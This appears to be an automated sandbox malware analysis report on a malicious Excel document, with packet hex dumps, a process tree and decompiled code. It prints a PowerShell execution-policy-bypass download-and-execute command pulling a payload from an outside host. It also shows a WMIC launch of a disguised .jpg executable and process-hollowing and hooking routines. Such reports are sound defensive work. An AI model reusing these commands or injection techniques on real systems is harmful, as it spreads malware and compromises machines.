                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                      Jan 8, 2021 09:40:25.271960974 CET1274INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                      Jan 8, 2021 09:40:25.271974087 CET1276INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                      Jan 8, 2021 09:40:25.271996975 CET1277INData Raw: 56 6b 41 41 41 41 41 41 4e 42 73 68 51 55 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 30 45 6b 41 41 41 51 41 45 41 4e 41 69 51 41 41 41 41 41 41 41 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 38 41 41 41 41 41 35 43 4e 41 41 50 79 52 57 51 41 41 41 41 41
                                                                                                                                                      Data Ascii: VkAAAAAANBshQUAAAAAAAAAAAAAAAC0EkAAAQAEANAiQAAAAAAA//////////8AAAAA5CNAAPyRWQAAAAAAAO9sBgAAAAAAAAAAAAAAAOwSQAABAAAA0CJAAAAAAAD//////////wAAAAAkI0AAyJFZAAAAAADAgHAGAAAAAAAAAAAAAAAAJBNAAAEAAQDQIkAAAAAAAP//////////AAAAAFQjQADskVkAAAAAAFCjdAYBACAA
                                                                                                                                                      Jan 8, 2021 09:40:25.272013903 CET1278INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0EkAAAQAAAAEABQDQIkAAAAAAAEBGQgD/////AAAAABQkQABgklkAAAAAAIgUbAYAAAAAAAAAAAAAAABoF0AAAQAAAPQwQAAAAAAAaBdAAAEAAA
                                                                                                                                                      Jan 8, 2021 09:40:25.272028923 CET1280INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4f 42 68
                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOBhAAPAWQAAEEkAAChJAABASQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBbCQE//8AAOmbWAIAgWwkBP//AADpnlkCAIFsJARD
                                                                                                                                                      Jan 8, 2021 09:40:25.272047997 CET1281INData Raw: 4b 45 6b 41 41 45 42 4a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                      Data Ascii: KEkAAEBJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEHEAAZBtAAAQSQAAKEkAAEBJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                      Jan 8, 2021 09:40:25.272066116 CET1282INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 77 64 51 41 42 6b 47 30 41 41 42 42 4a 41 41 41 6f 53 51 41 41 51 45 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAEwdQABkG0AABBJAAAoSQAAQEkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhJJZAIBGQgD/////AAAAAHSSWQAhm4f3L+GHTIYrsucVaf1TCgAGAAYA
                                                                                                                                                      Jan 8, 2021 09:40:25.454987049 CET1284INData Raw: 41 62 77 41 71 41 47 34 41 4b 67 42 30 41 43 6f 41 63 67 41 71 41 47 38 41 4b 67 42 73 41 43 6f 41 55 77 41 71 41 47 55 41 4b 67 42 30 41 43 6f 41 4d 41 41 71 41 44 41 41 4b 67 41 78 41 43 6f 41 58 41 41 71 41 46 4d 41 4b 67 42 6c 41 43 6f 41 63
                                                                                                                                                      Data Ascii: AbwAqAG4AKgB0ACoAcgAqAG8AKgBsACoAUwAqAGUAKgB0ACoAMAAqADAAKgAxACoAXAAqAFMAKgBlACoAcgAqAHYAKgBpACoAYwAqAGUAKgBzACoAXAAqAEQAKgBpACoAcwAqAGsAKgBcACoARQAqAG4AKgB1ACoAbQAqAAAAAAACAAAAMAAAACQAAAAqACsAVgArAEkAKwBSACsAVAArAFUAKwBBACsATAArACoAKwAAAAAAIA


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: EXCEL.EXE PID: 6560 Parent PID: 792

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:52
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x11a0000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cmd.exe PID: 6884 Parent PID: 6560

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:56
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
                                                                                                                                                      Imagebase:0xbd0000
                                                                                                                                                      File size:232960 bytes
                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: conhost.exe PID: 6896 Parent PID: 6884

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:57
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                                                                      File size:625664 bytes
                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: powershell.exe PID: 6940 Parent PID: 6884

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:57
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
                                                                                                                                                      Imagebase:0x1270000
                                                                                                                                                      File size:430592 bytes
                                                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: csc.exe PID: 3868 Parent PID: 6940

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:36
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
                                                                                                                                                      Imagebase:0xa30000
                                                                                                                                                      File size:2170976 bytes
                                                                                                                                                      MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cvtres.exe PID: 3596 Parent PID: 3868

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:40
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                      File size:43176 bytes
                                                                                                                                                      MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cmd.exe PID: 3144 Parent PID: 6940

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:44
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
                                                                                                                                                      Imagebase:0xbd0000
                                                                                                                                                      File size:232960 bytes
                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cmd.exe PID: 6588 Parent PID: 6940

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:44
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
                                                                                                                                                      Imagebase:0xbd0000
                                                                                                                                                      File size:232960 bytes
                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: WMIC.exe PID: 1636 Parent PID: 6588

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:45
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Imagebase:0xfe0000
                                                                                                                                                      File size:391680 bytes
                                                                                                                                                      MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: Test3.jpg PID: 4928 Parent PID: 4940

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:46
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1744221 bytes
                                                                                                                                                      MD5 hash:19387B30D6DBE83E31D3CAC884280D93
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:Visual Basic
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      Reputation:low

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: Test3.jpg PID: 3180 Parent PID: 4928

                                                                                                                                                      General

                                                                                                                                                      Start time:09:40:54
                                                                                                                                                      Start date:08/01/2021
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1744221 bytes
                                                                                                                                                      MD5 hash:19387B30D6DBE83E31D3CAC884280D93
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >

                                                                                                                                                        Analysis Process: Test3.jpg PID: 4928 Parent PID: 4940 Test3.jpgCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 0221000B, Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 423nativeprocessthreadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 022102B3
                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022102E0
                                                                                                                                                        • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0221048B
                                                                                                                                                        • NtGetContextThread.NTDLL(?,?), ref: 022104AA
                                                                                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 022104D0
                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 022104FA
                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 02210515
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.361003660.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Section$CreateMemoryViewVirtual$ContextProcessReadThreadUnmapWrite
                                                                                                                                                        • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                                                                                                        • API String ID: 2728646108-1087957892
                                                                                                                                                        • Opcode ID: bcf87377c71dcfbdcac5b030eefa62b0534a94d2d89b5e52df32e64cd139eec0
                                                                                                                                                        • Instruction ID: 5e3edd4a7551ab63d0ae99b81065a807fd7cbd292f3f2825ae5036744bb40f84
                                                                                                                                                        • Opcode Fuzzy Hash: bcf87377c71dcfbdcac5b030eefa62b0534a94d2d89b5e52df32e64cd139eec0
                                                                                                                                                        • Instruction Fuzzy Hash: 1AF137B1D2025AAFDF119FE5CC80EADBBF9BF14304F14406AE914AB205D7349A85CF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02210072, Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 386nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 022102B3
                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022102E0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.361003660.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Section$CreateView
                                                                                                                                                        • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                                                                                                        • API String ID: 1585966358-1087957892
                                                                                                                                                        • Opcode ID: 75cdb03a2f5591c3c9261b59964ef2ea38a464fa0195506f81b4241d2f89b83e
                                                                                                                                                        • Instruction ID: 3729869a4e4a049857c4487ebf0cf617944ee9e33ada4c2695261d7229d30611
                                                                                                                                                        • Opcode Fuzzy Hash: 75cdb03a2f5591c3c9261b59964ef2ea38a464fa0195506f81b4241d2f89b83e
                                                                                                                                                        • Instruction Fuzzy Hash: 5BE116B1D1025AAFDF119FE5CC81EAEBBF9BF14704F14406AE914AB205D7309A91CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0221002C, Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 379nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 022102B3
                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022102E0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.361003660.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Section$CreateView
                                                                                                                                                        • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                                                                                                        • API String ID: 1585966358-1087957892
                                                                                                                                                        • Opcode ID: ee550ceff3f92cceaa26ec42b91b71d8ed19d6dda6b5fb0b96e6032507b574d4
                                                                                                                                                        • Instruction ID: 34d9c149a38c5cfce04d81a8ff6ecae601263104298844fd920f8a133d76932a
                                                                                                                                                        • Opcode Fuzzy Hash: ee550ceff3f92cceaa26ec42b91b71d8ed19d6dda6b5fb0b96e6032507b574d4
                                                                                                                                                        • Instruction Fuzzy Hash: 2EE114B2D1025AAFDF119FE5CC80EAEBBB9BF18704F14406AE914AB205D7309A95CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 022100C7, Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 369nativethreadprocessCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 022102B3
                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 022102E0
                                                                                                                                                        • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0221048B
                                                                                                                                                        • NtGetContextThread.NTDLL(?,?), ref: 022104AA
                                                                                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 022104D0
                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 022104FA
                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 02210515
                                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0221052E
                                                                                                                                                        • NtSetContextThread.NTDLL(?,00010003), ref: 0221055F
                                                                                                                                                        • NtResumeThread.NTDLL(?,00000000), ref: 0221056C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.361003660.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Section$ThreadView$ContextCreateMemoryVirtual$ProcessReadResumeUnmapWrite
                                                                                                                                                        • String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
                                                                                                                                                        • API String ID: 1951729442-1087957892
                                                                                                                                                        • Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                                                                                                                                                        • Instruction ID: 2d78e09ccafc84a57b6860c48c13beef32698633757662db4531a4df324d5c47
                                                                                                                                                        • Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
                                                                                                                                                        • Instruction Fuzzy Hash: 7CE1F4B2D1025AAFDF11DFE5CC81EAEBBB9BF18304F14406AE914AB205D7309A95CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00424D1A, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153nativememoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                        			E00424D1A(void* __eflags) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				void* _t45;
				void* _t54;
				void* _t55;
				long _t57;
				long _t66;
				void* _t68;
				long _t81;
				void* _t82;
				int _t84;
				intOrPtr _t86;
				intOrPtr* _t95;
				void* _t98;
				void* _t102;
				void* _t104;
				void* _t105;

				_v20 = 0x100;
				_v12 = 5;
				E0042500D(_t45, 0x424a46);
				_t103 = E004252D0("SysAllocStringByteLen");
				E0042502F(_t102, 0x4249a4);
				_v40 = E00425271(_t47, "SysAllocStringByteLen");
				E0042502F(_t50, 0x4249d5);
				_v32 = E00425271(_t47, "SysAllocStringByteLen");
				E0042502F(_t52, 0x4249bb);
				_t54 = E00425271(_t103, "SysAllocStringByteLen");
				_v36 = _t54;
				_v16 = _t54;
				if( *0x5990b0 == 0) {
					_t81 = NtAllocateVirtualMemory(0xffffffff, 0x5990b0, 0,  &_v20, 0x3000, 0x40);
					if(_t81 >= 0) {
						goto L3;
					} else {
						return _t81;
					}
				}
				L3:
				_t55 =  *0x5990b0; // 0x2200000
				_v28 = _t55 +  *0x5990b4;
				_t57 = NtProtectVirtualMemory(0xffffffff,  &_v16,  &_v12, 0x40,  &_v8);
				if(_t57 < 0) {
					return _t57;
				}
				_t82 = 0;
				_t98 = _v28;
				_t104 = _v36;
				while(_t82 < 5) {
					_push( &_v24);
					_push(_t104);
					_t84 = E00424852();
					_t68 = memcpy(_t98, _t104, _t84);
					_t105 = _t105 + 0xc;
					_t98 = _t104 + _t84 + _t84;
					_t82 = _t82 + _t68;
					_t95 = _v24;
					_t86 =  *_t95;
					if(_t86 == 0xe9 || _t86 == 0xe8) {
						 *((intOrPtr*)(_t98 - 4)) =  *((intOrPtr*)(_t95 + 1)) + _t104 - _t98;
					} else {
						if(_t86 != 0xeb) {
							if(_t86 < 0x70 || _t86 > 0x7f) {
								if(_t86 == 0xf && _t86 >= 0x80 && _t86 <= 0x8f) {
									 *((intOrPtr*)(_t98 - 4)) =  *((intOrPtr*)(_t95 + 2)) + _t104 - _t98;
								}
							} else {
								 *((char*)(_t98 - 2)) = 0xf;
								 *((char*)(_t98 - 1)) = _t86 + 0x10;
								asm("stosd");
							}
						} else {
							 *((char*)(_t98 - 2)) = 0xe9;
							 *((intOrPtr*)(_t98 - 1)) =  *((char*)(_t95 + 1)) + _t104 - 3 - _t98;
							_t98 = _t98 + 3;
						}
					}
				}
				 *0x5990b4 =  *0x5990b4 + _t82 + 5;
				asm("stosb");
				asm("stosd");
				 *0x5990a4 = _v36;
				asm("stosb");
				 *0x5990a8 = E00424EE7;
				asm("stosd");
				 *0x5990ac = _v28;
				_v12 = 5;
				_t66 = NtProtectVirtualMemory(0xffffffff,  &_v36,  &_v12, _v8,  &_v8);
				 *0x5990b8 =  *0x5990b8 + 1;
				return _t66;
			}



























                                                                                                                                                        0x00424d24
                                                                                                                                                        0x00424d2b
                                                                                                                                                        0x00424d37
                                                                                                                                                        0x00424d46
                                                                                                                                                        0x00424d4c
                                                                                                                                                        0x00424d5c
                                                                                                                                                        0x00424d64
                                                                                                                                                        0x00424d74
                                                                                                                                                        0x00424d7c
                                                                                                                                                        0x00424d87
                                                                                                                                                        0x00424d8c
                                                                                                                                                        0x00424d8f
                                                                                                                                                        0x00424d99
                                                                                                                                                        0x00424db1
                                                                                                                                                        0x00424db7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00424db7
                                                                                                                                                        0x00424dbe
                                                                                                                                                        0x00424dbe
                                                                                                                                                        0x00424dc9
                                                                                                                                                        0x00424ddc
                                                                                                                                                        0x00424de2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00424de9
                                                                                                                                                        0x00424deb
                                                                                                                                                        0x00424dee
                                                                                                                                                        0x00424df1
                                                                                                                                                        0x00424dfd
                                                                                                                                                        0x00424dfe
                                                                                                                                                        0x00424e04
                                                                                                                                                        0x00424e06
                                                                                                                                                        0x00424e06
                                                                                                                                                        0x00424e06
                                                                                                                                                        0x00424e08
                                                                                                                                                        0x00424e0a
                                                                                                                                                        0x00424e0d
                                                                                                                                                        0x00424e13
                                                                                                                                                        0x00424e22
                                                                                                                                                        0x00424e27
                                                                                                                                                        0x00424e2a
                                                                                                                                                        0x00424e45
